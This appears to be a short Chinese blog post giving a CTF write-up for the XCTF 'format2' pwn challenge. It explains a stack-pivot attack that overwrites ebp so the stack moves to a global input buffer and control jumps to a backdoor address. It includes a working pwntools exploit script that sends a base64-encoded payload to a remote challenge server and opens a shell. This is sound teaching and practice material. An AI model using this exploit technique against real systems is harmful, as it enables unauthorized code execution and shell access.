xctf format2

mac2022-06-30  104

日常水题的一天这个和pwnable.kr 上的一道题很像也是一道栈迁移的题目 我们直接看main函数 把输入的base64解密长度不能超过12 目的是correct函数 发现这里可以覆盖ebp我们就可以将栈迁移到input处然后mov esp,ebp ; pop ebp; pop eip;main函数公用ebp控制eip为我们的后门地址直接拿到shell(打pwn不要限制于拿到shell哦) exp:

from pwn import * import base64 #p=process('./fmt') p=remote('111.198.29.45',49541) elf=ELF('./fmt') def debug(): gdb.attach(p) pause() system_addr=0x08049284 input_addr=0x0811EB40 payload='a'*4+p32(system_addr)+p32(input_addr) #debug() p.sendline(base64.b64encode(payload)) p.interactive()

我虽然pwn不厉害 但是我基础的还是会一点的

最新回复(0)